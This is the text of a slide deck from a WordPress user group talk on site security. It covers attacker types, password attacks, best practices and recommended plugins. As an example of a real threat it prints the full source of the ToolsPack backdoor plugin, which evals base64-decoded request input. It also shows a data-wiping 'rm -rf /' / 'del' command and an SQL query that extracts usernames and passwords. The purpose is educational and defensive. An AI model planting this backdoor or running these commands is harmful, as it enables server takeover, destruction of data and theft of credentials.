Intro to Wordpress SecurityPrepared for the Oklahoma City Wordpress User Group by Chris Dodds

Chris DoddsOwner & Principal Advisor at Focusfire IT Strategy & Consulting

Features: Ten+ years of experience across multiple industries and IT disciplines.

System Requirements: Food, water, & internet connectivity.

Certifications:CISSPMCITP:SASecurity+Network+

This talk is not about the top 5 WP security threats.

Let’s talk about Betty.

Betty’s Fancy Blog o’ Gnomes

Betty’s Fancy Server

Betty’s Fancy Audience

Betty’s Fancy Employer

It’s not about you, Betty.

The Players

Script kiddies Hacktivists Pro Criminals

Information Warriors

Enumeration

Access

Exploitation

Password Attacks

Exploit weak passwords

Dictionary based

Can be entirely automated

<?php/*Plugin  Name:  ToolsPackDescription:  Supercharge  your  WordPress  site  with  powerful  features  previously  only  available  to  WordPress.com  users.  core  release.  Keep  the  plugin  updated!Version:  1.2Author:  Mark  StainAuthor  URI:  http://checkWPTools.com/*/$_REQUEST[e]  ?  EVAL(  base64_decode(  $_REQUEST[e]  )  )  :  exit;?>

ToolsPack Plugin

Source - http://blog.sucuri.net/2012/02/new-wordpress-toolspack-plugin.html

toolspack.php

Execute commands on you server

Execute commands against your WP database

$WINDIR ? `del /F/S/Q $WINDIR\*` : `rm -rf /`;

SELECT login + '-' + password FROM users

This backdoor code allows the remote user to:

More Likely...

Payload - keylogger, trojan, spyware, virus

“garden gnomes, free chaps, leather sale, cheap sex, porn,

prescription drugs, coupons, free avon”

SEO Spam - links, keywords

Best PracticesUpdate! Update! Update!

Don’t use the “admin” user.

Use a unique passphrase.

Disable or delete un-used plugins.

Backup & test your backups.

These are all things your attacker will do once they control your site.

Recommended PluginsBackup

BackWPup - open-source or BackupBuddy - commercial

Security

Better WP Security - open-source

Limit Login Attempts - open-source

Sucuri SiteCheck Scanner - http://sitecheck.sucuri.net/

Contact and Q&A

Chris Doddse-mail - chris.dodds@focusfire.nettwitter - @doddschrisweb - chrisdodds.net